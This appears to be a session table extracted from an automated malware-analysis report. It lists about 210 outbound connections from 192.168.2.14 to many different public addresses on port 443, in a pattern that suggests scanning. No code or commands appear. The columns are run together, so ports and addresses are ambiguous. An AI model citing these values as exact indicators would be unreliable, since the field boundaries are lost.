                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17695192.168.2.1455900168.120.100.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17696192.168.2.144851037.185.12.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17697192.168.2.144391452.205.166.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17698192.168.2.1437886196.84.242.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17699192.168.2.145061469.116.138.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17700192.168.2.144956254.8.105.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17701192.168.2.145749248.138.85.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17702192.168.2.1433786190.163.201.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17703192.168.2.143763631.87.187.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17704192.168.2.1438962179.34.35.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17705192.168.2.1451004178.75.144.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17706192.168.2.1457820175.41.5.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17707192.168.2.144311887.156.51.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17708192.168.2.14351524.203.159.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17709192.168.2.1433880189.239.154.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17710192.168.2.1455718188.156.123.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17711192.168.2.1443346100.230.106.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17712192.168.2.144122080.123.80.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17713192.168.2.144332088.52.33.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17714192.168.2.1435148193.197.24.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17715192.168.2.143518485.19.137.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17716192.168.2.145377060.153.242.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17717192.168.2.1444598166.129.114.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17718192.168.2.144145860.17.126.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17719192.168.2.1435392116.128.181.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17720192.168.2.1458230202.143.104.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17721192.168.2.1432894178.18.114.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17722192.168.2.1451260163.185.131.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17723192.168.2.1451668118.169.5.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17724192.168.2.145062095.182.193.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17725192.168.2.1446188208.53.41.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17726192.168.2.1455566122.178.1.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17727192.168.2.144474480.249.181.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17728192.168.2.145856437.14.255.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17729192.168.2.1452204217.65.127.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17730192.168.2.1454436163.186.156.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17731192.168.2.143522666.221.247.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17732192.168.2.144073470.205.34.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17733192.168.2.1459214155.12.170.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17734192.168.2.145675653.184.40.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17735192.168.2.144636412.56.241.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17736192.168.2.145437879.174.15.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17737192.168.2.1455440152.227.85.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17738192.168.2.1440696192.81.5.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17739192.168.2.144365631.115.138.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17740192.168.2.1452832161.250.86.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17741192.168.2.145123049.244.127.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17742192.168.2.1441282123.35.77.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17743192.168.2.1437162193.35.118.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17744192.168.2.144770449.202.45.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17745192.168.2.144311418.196.160.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17746192.168.2.144039689.65.70.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17747192.168.2.1439556137.21.49.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17748192.168.2.145213640.235.53.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17749192.168.2.1448778123.209.106.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17750192.168.2.1442810198.149.56.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17751192.168.2.1455672148.169.254.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17752192.168.2.146052091.199.113.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17753192.168.2.1458486152.20.42.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17754192.168.2.144933672.190.250.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17755192.168.2.144397066.114.96.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17756192.168.2.1436078137.205.100.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17757192.168.2.14329049.167.33.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17758192.168.2.144681051.29.237.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17759192.168.2.145703442.31.35.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17760192.168.2.1455794187.157.83.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17761192.168.2.145549053.19.127.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17762192.168.2.1446912195.222.161.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17763192.168.2.1455796163.201.127.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17764192.168.2.144799060.157.118.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17765192.168.2.1457110120.167.157.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17766192.168.2.143680413.46.250.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17767192.168.2.1451732136.169.218.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17768192.168.2.1439432195.53.214.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17769192.168.2.144358444.101.24.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17770192.168.2.145059654.148.39.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17771192.168.2.1457884118.206.118.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17772192.168.2.145441243.168.112.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17773192.168.2.145034424.72.185.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17774192.168.2.143984891.75.11.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17775192.168.2.1435008165.158.42.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17776192.168.2.1447150180.9.24.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17777192.168.2.143632461.86.175.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17778192.168.2.1440346159.229.74.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17779192.168.2.144960444.231.216.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17780192.168.2.1438788173.102.82.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17781192.168.2.14463268.188.79.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17782192.168.2.1451258114.70.23.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17783192.168.2.1438540187.4.33.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17784192.168.2.143432265.140.83.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17785192.168.2.1452070219.55.217.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17786192.168.2.145746281.233.107.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17787192.168.2.144309483.63.245.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17788192.168.2.1441818194.62.136.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17789192.168.2.1441094130.150.1.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17790192.168.2.1447028102.78.245.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17791192.168.2.1433644128.245.92.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17792192.168.2.1456762183.127.254.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17793192.168.2.14488169.112.201.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17794192.168.2.144916434.34.245.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17795192.168.2.144367043.46.227.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17796192.168.2.146058064.197.248.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17797192.168.2.1450492101.157.123.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17798192.168.2.145033467.130.218.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17799192.168.2.1451366168.177.232.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17800192.168.2.1449634164.148.191.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17801192.168.2.144635047.18.154.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17802192.168.2.1458586136.182.126.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17803192.168.2.144307262.22.201.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17804192.168.2.1450752119.63.78.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17805192.168.2.1449694153.89.64.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17806192.168.2.145128817.148.67.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17807192.168.2.1445362143.248.76.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17808192.168.2.1434980166.107.127.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17809192.168.2.144700054.238.32.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17810192.168.2.1447328212.120.219.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17811192.168.2.145791290.216.92.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17812192.168.2.144291488.15.134.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17813192.168.2.144019844.113.145.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17814192.168.2.1460498157.40.7.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17815192.168.2.1443358131.61.62.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17816192.168.2.1444822145.37.3.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17817192.168.2.1455856176.191.117.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17818192.168.2.144241844.4.242.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17819192.168.2.14382721.168.114.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17820192.168.2.1457452159.122.244.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17821192.168.2.145379444.165.40.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17822192.168.2.1436046101.221.209.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17823192.168.2.1452808142.13.179.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17824192.168.2.1457272202.68.223.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17825192.168.2.1460638180.242.224.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17826192.168.2.146087624.178.28.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17827192.168.2.145577448.16.52.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17828192.168.2.1447734141.216.126.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17829192.168.2.143404089.178.215.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17830192.168.2.143393888.243.222.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17831192.168.2.1439210125.133.238.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17832192.168.2.1449578119.46.203.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17833192.168.2.145608652.5.213.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17834192.168.2.1449868164.126.62.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17835192.168.2.1432982223.130.225.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17836192.168.2.1435850185.53.199.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17837192.168.2.145228471.232.103.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17838192.168.2.1459608218.29.58.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17839192.168.2.1446672112.75.133.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17840192.168.2.145781825.174.212.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17841192.168.2.1441926119.242.118.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17842192.168.2.145940482.102.86.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17843192.168.2.1450424170.98.221.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17844192.168.2.1447680156.74.207.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17845192.168.2.144833642.55.203.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17846192.168.2.145638680.207.161.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17847192.168.2.1453424102.83.190.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17848192.168.2.1437320139.243.86.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17849192.168.2.1448746164.72.165.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17850192.168.2.144849095.138.127.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17851192.168.2.144891035.67.208.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17852192.168.2.1455328199.80.208.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17853192.168.2.1460834139.124.78.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17854192.168.2.1450136158.2.70.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17855192.168.2.1455330191.61.195.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17856192.168.2.1448472168.120.251.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17857192.168.2.143882645.163.211.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17858192.168.2.1449852219.236.1.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17859192.168.2.1442518204.178.55.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17860192.168.2.1451566209.185.137.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17861192.168.2.1444296208.92.225.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17862192.168.2.1441470131.228.101.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17863192.168.2.1442820149.204.141.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17864192.168.2.1444812216.236.233.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17865192.168.2.144162276.173.125.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17866192.168.2.1450106101.46.28.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17867192.168.2.144707490.23.174.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17868192.168.2.1433464152.214.189.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17869192.168.2.1450472223.239.190.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17870192.168.2.145609865.191.49.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17871192.168.2.144693632.114.52.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17872192.168.2.14486501.227.160.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17873192.168.2.1455762223.119.203.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17874192.168.2.1433232148.142.13.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17875192.168.2.145482866.69.206.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17876192.168.2.1451842201.16.86.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17877192.168.2.144277024.87.220.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17878192.168.2.1433352186.113.142.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17879192.168.2.144051636.73.244.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17880192.168.2.1448008144.104.245.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17881192.168.2.144395269.154.36.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17882192.168.2.1437302132.97.30.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17883192.168.2.143479454.197.15.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17884192.168.2.1436314133.183.113.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17885192.168.2.145154446.104.126.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17886192.168.2.1455954129.64.251.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17887192.168.2.1456718115.86.224.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17888192.168.2.1448144158.173.69.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17889192.168.2.1435466185.253.234.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17890192.168.2.1447900136.32.47.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17891192.168.2.143547813.63.104.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17892192.168.2.1433742185.147.169.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17893192.168.2.1450440186.140.186.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17894192.168.2.1454468125.88.202.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17895192.168.2.145226623.78.180.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17896192.168.2.1440132211.191.129.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17897192.168.2.1444180182.28.4.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17898192.168.2.144169883.50.18.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17899192.168.2.1451452147.52.65.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17900192.168.2.144910443.70.47.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17901192.168.2.1444082195.228.159.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17902192.168.2.1454862158.187.33.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17903192.168.2.1439404162.59.136.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17904192.168.2.144082690.104.44.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17905192.168.2.144051213.47.103.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17906192.168.2.144229231.229.210.172443
                                                      TimestampBytes transferredDirectionData


